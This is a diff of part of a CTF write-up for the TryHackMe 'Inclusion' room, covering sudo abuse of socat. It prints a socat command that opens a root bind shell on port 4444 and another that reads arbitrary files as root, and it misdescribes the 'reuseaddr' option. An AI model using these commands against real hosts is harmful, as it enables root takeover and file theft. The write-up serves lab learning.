Prim1Tive/CTFwriteups/TryHackMe/Inclusion.md

 and we do have a permission to sudo on the socat program (very similar to netcat but with a different syntax)

-a quick search on the web and i found this line of code: "socat TCP4-LISTEN:4444,reuseaddr  OPEN:[$file]" (alternatively we can use this line to get a permanent shell and OWN the machine "sudo socat TCP4-LISTEN:4444,reuseaddr  SYSTEM:/bin/sh")
+a quick search on the web and i found this line of code: "socat TCP4-LISTEN:4444,reuseaddr  OPEN:[$file]" (alternatively we can use this line to get a Shell and OWN the machine "sudo socat TCP4-LISTEN:4444,reuseaddr  SYSTEM:/bin/sh")

 ### socat TCP4-LISTEN:4444,reuseaddr  OPEN:[$file]
 >TCP4-LISTEN =       use ipv4 listiner

-4444 =                        our port (simmilarly to netcat) reuseaddr =              use this user machine ip address
+>4444 =                        our port (simmilarly to netcat)

+>reuseaddr =              use this user machine ip address

-OPEN: =                    part of the socat abillitis to open files (use 'SYSTEM' to execute files) [$file] =                     the file we want to read
+>OPEN: =                    part of the socat abillitis to open files (use 'SYSTEM' to execute files)

+>[$file] =                     the file we want to read

 our syntax will be as follow (dont forget 'sudo' to run this proccess as root)